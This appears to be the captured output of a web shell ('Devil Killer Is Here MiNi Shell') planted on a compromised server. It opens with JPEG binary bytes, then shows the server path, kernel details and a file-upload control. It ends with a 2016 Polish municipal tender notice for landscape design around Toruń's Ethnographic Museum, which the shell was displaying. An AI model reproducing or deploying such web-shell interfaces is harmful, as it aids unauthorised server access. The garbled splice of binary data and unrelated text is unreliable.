JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160408/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160408/36387-N-2016.html

<p class="kh_header"><b>Toruń: Wykonanie wielobranżowej dokumentacji projektowej zadania pn. Zagospodarowanie terenów zieleni w otoczeniu Muzeum Etnograficznego w Toruniu</b><br>
<b>Numer ogłoszenia: 36387 - 2016; data zamieszczenia: 08.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Toruń reprezentowana przez Prezydenta Miasta Torunia , ul. Wały gen. Sikorskiego 8, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 056 6118713, faks 056 6118622.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> um.torun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie wielobranżowej dokumentacji projektowej zadania pn. Zagospodarowanie terenów zieleni w otoczeniu Muzeum Etnograficznego w Toruniu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie wielobranżowej dokumentacji projektowej zadania pn. Zagospodarowanie terenów zieleni w otoczeniu Muzeum Etnograficznego w Toruniu.
2. Zakres dokumentacji projektowej obejmuje:   
1) modernizację nawierzchni utwardzonych - alejek pieszych, polegającą na wymianie nawierzchni głównych ciągów komunikacyjnych i dobudowie nielicznych nowych alejek;
2) energooszczędne oświetlenie;
3) monitoring wizyjny;
4) modernizację dwóch istniejących placów - miejsc o charakterze reprezentacyjnym i rekreacyjnym, polegającą na wymianie nawierzchni i lokalizacji elementów małej architektury parkowej (ławki, kosze na odpady, stojaki rowerowe, latarnie itp.);
5) utworzenie dwóch płytkich sadzawek - oczek wodnych;
6) wymianę istniejących obiektów małej architektury, będących w złym stanie technicznym, takich jak: ławki, kosze na odpady, stojaki rowerowe, latarnie i lampy niskie na nowe;
7) utworzenie szlaku kulturowo-przyrodniczego Twierdzy Toruń, i in. - zgodnie z koncepcją zagospodarowania pn. Zagospodarowanie terenów zieleni w otoczeniu Muzeum Etnograficznego w Toruniu, wykonanej przez firmę Gringoo Architektura Krajobrazu, w 2015 r., jak również z zapisami zawartymi w dokumentacji aplikacyjnej (studium wykonalności oraz wniosku o dofinansowanie dla projektu pn. Zagospodarowanie terenów zieleni w otoczeniu Muzeum Etnograficznego w Toruniu, złożonego przez Gminę Miasta Toruń w konkursie Działania 2.5 POIiŚ 2014-2020 (nr POIS.2.5/1/2015), w dniu 29.02.2016 r; 
8) rozwiązania stanowiące odpowiedź na wskazane przez Zamawiającego na etapie realizacji przedmiotu zamówienia kryteria wyboru projektów dla Działania 2.5 Poprawa jakości środowiska miejskiego Programu Operacyjnego Infrastruktura i Środowisko 2014-2020 (j.w.), wraz z odpowiadającą im kompleksową argumentacją (w postaci odrębnej analizy) uzasadnioną w opisie dokumentacji projektowej;
9) monitoring stanu nasadzeń (w tym monitoring żywotności i uzupełniania ubytków zieleni w okresie trwałości projektu); 
10) rozwiązania w zakresie ograniczenia występowania roślin należących do inwazyjnych gatunków obcych, m.in. poprzez ich usunięcie z terenu lub zapewnienie konieczności stosowania Kodeksu dobrych praktyk Ogrodnictwo wobec roślin inwazyjnych obcego pochodzenia);
11) rozwiązania uwzględniające możliwość poprawy stateczności skarpy od strony ul. Odrodzenia metodami biologicznymi;
12) dostosowanie funkcjonalne obszaru do potrzeb osób niepełnosprawnych i wykluczonych (w tym m.in. likwidację barier architektonicznych dla zwiększenia poziomu bezpieczeństwa użytkowników tego terenu);
13) inne rozwiązania zaproponowane przez projektanta i zatwierdzone przez Zamawiającego.
3. Podstawowe założenia do realizacji przedmiotu zamówienia:   
- obszar objęty opracowaniem znajduje się w centralnej części Torunia (dz. nr 14/1 i 14/7 - obręb 14; powierzchnia 1,9836 ha,). 
- materiałem wyjściowym opracowania jest koncepcja zagospodarowania pn. Zagospodarowanie terenów zieleni w otoczeniu Muzeum Etnograficznego w Toruniu, wykonana przez firmę Gringoo Architektura Krajobrazu, w 2015 r. (stanowiąca załącznik nr 1 do SIWZ), jak również:
a) Uchwała Nr 491/13 Rady Miasta Torunia z dnia 21 lutego 2013 r. w sprawie miejscowego planu zagospodarowania przestrzennego Aleja Solidarności dla terenu położonego w rejonie ulic: Al. Solidarności, Wały Gen. Sikorskiego i Uniwersyteckiej w Toruniu;
b) uwagi mieszkańców, będące wynikiem konsultacji społecznych prowadzonych na rzecz przedmiotowego zadania i wynikające z raportu końcowego z tychże konsultacji - zatwierdzone przez Zamawiającego;
c) Plan Zarządzania Krajobrazem dla miasta Torunia (LMP-Landscape Management Plan) dostępny na GEOPORTALu miasta Torunia pod linkiem: http://mapa.um.torun.pl , uwzględniający wytyczne do projektowania dla przedmiotowego terenu, pod kątem aspektu: środowiskowego, kulturowego, społecznego i ekonomicznego- tabela ZJK II/3 (stanowiąca załącznik nr 2 do SIWZ);
d) Kryteria wyboru projektów dla Działania 2.5 Poprawa jakości środowiska miejskiego Programu Operacyjnego Infrastruktura i Środowisko 2014-2020; Oś priorytetowa: 2. Ochrona środowiska, w tym adaptacja do zmian klimatu; Typ projektu 2.5.2 Rozwój terenów zieleni w miastach i ich obszarach funkcjonalnych - konkurs nr POIS.2.5/1/2015 (stanowiące załącznik nr 3 do SIWZ).
4. Wykaz opracowań wchodzących w skład przedmiotu zamówienia:  
1)  wielobranżowy projekt budowlany zawierający wszystkie elementy projektu wykonawczego, w zakresie zapewniającym spełnienie wszystkich zakładanych funkcji obszaru projektowego,
2)  informacja dotycząca bezpieczeństwa i ochrony zdrowia, 
3) specyfikacja techniczna wykonania i odbioru robót budowlanych (wszystkie branże) + wersja elektroniczna (format PDF + wersja edytowalna),
4) przedmiar robót + wersja elektroniczna (format pdf i ath),
5) kosztorys inwestorski + wersja elektroniczna (format pdf i ath),
6) zbiorcze zestawienie całości kosztów inwestycji (ZZK), w tym wynikające m.in. z: kosztorysów inwestorskich, kosztów wykonania dokumentacji projektowej, nadzorów inwestorskich i autorskich, umów przyłączeniowych i innych,
7) inne opracowania wynikające z otrzymanych warunków technicznych przyłączenia oraz niezbędne do spełnienia wszystkich zakładanych funkcji i uzyskania koniecznych pozwoleń, w tym pozwolenia na budowę  (lub, gdy pozwolenie na budowę nie jest wymagane - do zgłoszenia zamiaru rozpoczęcia robót budowlanych);
8) dokumentacja projektowa  także w wersji elektronicznej - w formacie pdf i dwg oraz doc - część opisowa.
5. Do wszystkich robót objętych przedmiotem zamówienia należy stosować materiały o właściwym standardzie i wysokiej jakości, zgodnie z wytycznymi służb konserwatorskich. 
6. Przedmiot zamówienia obejmuje ponadto:  
1) wykonanie mapy syt. - wys. w skali 1:500 z aktualizacją do celów projektowych;
2) wykonanie mapy ewidencyjnej terenu objętego projektowaną inwestycją wraz z informacją z rejestru gruntów;
3) wykonanie inwentaryzacji wielobranżowej w zakresie wymaganym do wykonania projektu budowlanego;
4) uzyskanie w imieniu i na rzecz Zamawiającego warunków technicznych przyłączenia do infrastruktury technicznej od właściwych instytucji eksploatujących sieci, jeżeli będą wymagane (na podstawie przygotowanych przez Wykonawcę w terminie 7 dni roboczych od zawarcia umowy - lub innym technicznie uzasadnionym terminie wyznaczonym przez Zamawiającego - stosownych kompletnych wniosków z wymaganymi załącznikami - po odpowiednich uzgodnieniach z  Zamawiającym);     
5) uzyskanie w imieniu i na rzecz Zamawiającego wszelkich wymaganych opinii, pozwoleń, uzgodnień i decyzji administracyjnych (w tym m.in. decyzji o pozwoleniu na budowę /lub, gdy pozwolenie na budowę nie jest wymagane - do zgłoszenia zamiaru rozpoczęcia robót budowlanych, decyzji o pozwoleniu na wycinkę drzew i krzewów oraz nasadzenia zastępcze, oraz innych wynikających z opracowanego projektu), a także wszelkich innych wymaganych przy projektowaniu i realizacji (na podstawie przygotowanych przez Wykonawcę w terminie 7 dni roboczych od zawarcia umowy - lub innym technicznie uzasadnionym terminie wyznaczonym przez Zamawiającego - stosownych kompletnych wniosków z wymaganymi załącznikami - po odpowiednich uzgodnieniach z  Zamawiającym); 
6) opracowanie dodatkowych plansz/rysunków graficznych (np. w postaci poglądowych, plastycznych wizualizacji przestrzennych 3D (minimum 5 różnych plansz po 3 sztuki - wersja kolorowa drukowana i analogiczna elektroniczna w formacie .jpg/.tiff), pokazujących detale elementów małej architektury czy wybranych charakterystycznych fragmentów terenu, w tym rzut obszaru objętego opracowaniem w skali 1:500 - opatrzone zwięzłym opisem; wizualizacje (poza rysunkami technicznymi) muszą być czytelne dla przeciętnego odbiorcy uczestniczącego w planowanych konsultacjach nad projektem (dostarczone przez Wykonawcę do Zamawiającego w terminie do 30 dni roboczych od podpisania umowy, w wersji elektronicznej oraz drukowanej-kolorowej, po 3 sztuki dla każdej planszy tematycznej); zgodnie z założeniami koncepcji zagospodarowania wzmiankowanej w § 1 ust. 2 pkt 7 wzoru umowy).
7) opracowanie i przedstawianie aktualnej prezentacji multimedialnej wykonanego projektu podczas spotkań z Zamawiającym, podczas których Wykonawca zapewni osobisty, czynny udział właściwego projektanta (lub osoby upoważnionej posiadającej odpowiednie uprawnienia projektowe). Prezentacja powinna być stworzona w formie programu Power Point, możliwej do edycji przez Zamawiającego, wraz z dodatkowymi, oddzielnymi załącznikami graficznymi w formie plików jpg/tiff;
8) wsparcie merytoryczne w tworzeniu raportu końcowego z konsultacji społecznych;
9) zapewnienie osobistego, czynnego udziału projektanta (lub osoby upoważnionej, z odpowiednimi uprawnieniami) w procesie konsultacji społecznych/narad wewnętrznych organizowanych przez Zamawiającego (do 4 spotkań na miejscu, w siedzibie Zamawiającego - nie później niż do drugiego dnia roboczego od powiadomienia przez Zamawiającego o takiej konieczności);
10) przeniesienie na Zamawiającego praw autorskich majątkowych (autorsko-majątkowych) do wykonanej dokumentacji projektowej w zakresie objętym niniejszą Umową;
11) sprawowanie nadzoru autorskiego w trakcie realizacji inwestycji (na podstawie dokumentacji projektowej objętej przedmiotem umowy), z zastrzeżeniem ust. 15 wzoru umowy.


Terminy wykonania przedmiotu zamówienia ustala się następująco:
1)wykonanie I elementu umowy wg specyfikacji § 1 ust. 6 pkt 6 i 7 wzoru umowy:  nie później niż do 30 dni roboczych od podpisania umowy;
2) wykonanie II elementu umowy, tj. projektów budowlanych i kompletu opracowań niezbędnych do uzyskania pozwolenia na budowę: nie później niż do 20 września 2016 r.
3) Wykonanie III elementu umowy, tj. projektów wykonawczych, przedmiarów robót, kosztorysów inwestorskich oraz pozostałych opracowań projektowych: nie później niż do 15 grudnia 2016 r.;
4) przygotowanie IV elementu umowy, tj. kompletnego wniosku o wydanie decyzji o pozwoleniu na budowę: w terminie 14 dni od bezusterkowego odbioru II elementu umowy;
5) czynności związane z pełnieniem nadzoru autorskiego zostaną podjęte po zawarciu umowy z realizatorem robót i trwać będą do zakończenia realizacji robót na podstawie dokumentacji projektowej będącej przedmiotem zamówienia..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.24.20.00-6, 71.25.00.00-5, 71.31.30.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie stawia szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający uzna warunek za spełniony jeżeli wykonawca wykaże, że zrealizował w ciągu ostatnich 3 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), w sposób należyty co najmniej dwie prace projektowe obejmujące swoim zakresem zagospodarowanie terenów zieleni, gdzie udział powierzchni pokrytej zielenią jest nie mniejszy niż 1ha</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie stawia szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający uzna warunek za spełniony jeżeli wykonawca wykaże, że osoby, którymi dysponuje wykonawca i które będą uczestniczyć w wykonaniu zamówienia muszą posiadać uprawnienia budowlane do projektowania bez ograniczeń lub ograniczonym zakresie stosownie do powierzonych czynności w specjalnościach:
-  architektonicznej - min. 1 osoba,
- instalacyjnej w zakresie instalacji i urządzeń cieplnych, wentylacyjnych gazowych, wodociągowych i kanalizacyjnych - min. 1 osoba,
- instalacyjnej w zakresie instalacji i urządzeń elektrycznych i energetycznych - min. 1 osoba,
wydane na podstawie ustawy Prawo Budowlane i Rozporządzenia Ministra Infrastruktury
i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2014 r. poz. 1278) lub inne odpowiednie wydane na podstawie wcześniej obowiązujących przepisów lub odpowiadające im uprawnienia budowlane, które zostały wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art.12a oraz innych przepisów ustawy z dnia 7 lipca 1994 r. Prawo Budowlane ( t. jedn. Dz. U. z 2016 r., poz. 290) oraz ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej ( Dz. U. z 2016 r., poz. 65).
Zamawiający dopuszcza możliwość łączenia przez jedną osobę kilku wymienionych specjalności</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie stawia szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Pisemne zobowiązanie podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, jeżeli Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolności finansowej lub ekonomicznej innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. 2. Jeżeli wykonawca, wykazując spełnienie warunków , o których mowa w pkt 3.2., 3.3. siwz polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, zamawiający, w celu oceny, czy wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów żąda dokumentów dotyczących w szczególności: a) zakresu dostępnych wykonawcy zasobów innego podmiotu, b) sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia, c) charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem, d) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia. Oświadczenia: - oświadczenie Wykonawcy, które z informacji zawartych w ofercie na stronach od .... do .... stanowią tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy o zwalczaniu nieuczciwej konkurencji i jako takie nie mogą być udostępniane innym uczestnikom postępowania. W przypadku zastrzeżenia informacji przez wykonawcę zobowiązany jest on wykazać, że zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa. Brak powyższego oświadczenia oznaczał będzie, że dokumenty składające się na ofertę nie stanowią tajemnicy przedsiębiorstwa (Wykonawca nie może zastrzec dokumentów, o których mowa w art. 86 ust. 4 ustawy). - oświadczenie Wykonawcy jaką cześć zamówienia zamierza powierzyć podwykonawcom (jeżeli wykonawca przewiduje wykonanie przedmiotu zamówienia przy udziale podwykonawców) lub podanie nazw (firm) podwykonawców, na których zasoby wykonawca powołuje się na zasadach określonych w art. 26 ust. 2 b, w celu wykazania spełniania warunków udziału w postępowaniu o których mowa w art. 22 ust. 1. ustawy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - okres rękojmi - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. W przypadkach przewidzianych w umowie dopuszcza się wprowadzenie zmian za zgodą stron umowy.
2. Zmiany mogą być inicjowane przez Zamawiającego lub przez Wykonawcę.
3. Dopuszczalne jest dokonanie zmian umowy:
1) jeżeli zmiana  umowy będzie korzystna dla Zamawiającego i w szczególności dotyczyć będzie: 
a) zmiany  zaprojektowanej  technologii  wykonawstwa robót,
b) zamiany materiałów przewidzianych do wykonania robót określonych  w dokumentacji projektowej,
c) innych nie wymienionych zmian korzystnych dla Zamawiającego,
2) jeżeli zmiana umowy dotyczyć będzie uszczegółowienia przedmiotu umowy, dotyczącego np. wielkości, rozmieszczenia, zastępujących rozwiązań itp., rezygnacji z niektórych opracowań lub zastąpienia ich innymi,  
3) jeżeli zmiana umowy dotyczyć będzie zmiany terminu wykonania przedmiotu  zamówienia:   
a) z przyczyn niezależnych od którejkolwiek ze stron,  które w szczególności dotyczyć będą uwarunkowań formalno-prawnych, zwłaszcza dotyczących wprowadzenia zmian do dokumentacji projektowej na etapie projektowania zadania,
b) w przypadku, gdy nastąpi  uszczegółowienie przedmiotu umowy dotyczące np.   wielkości, rozmieszczenia, zastępujących rozwiązań itp., rezygnacji z niektórych opracowań lub zastąpienia ich innymi,
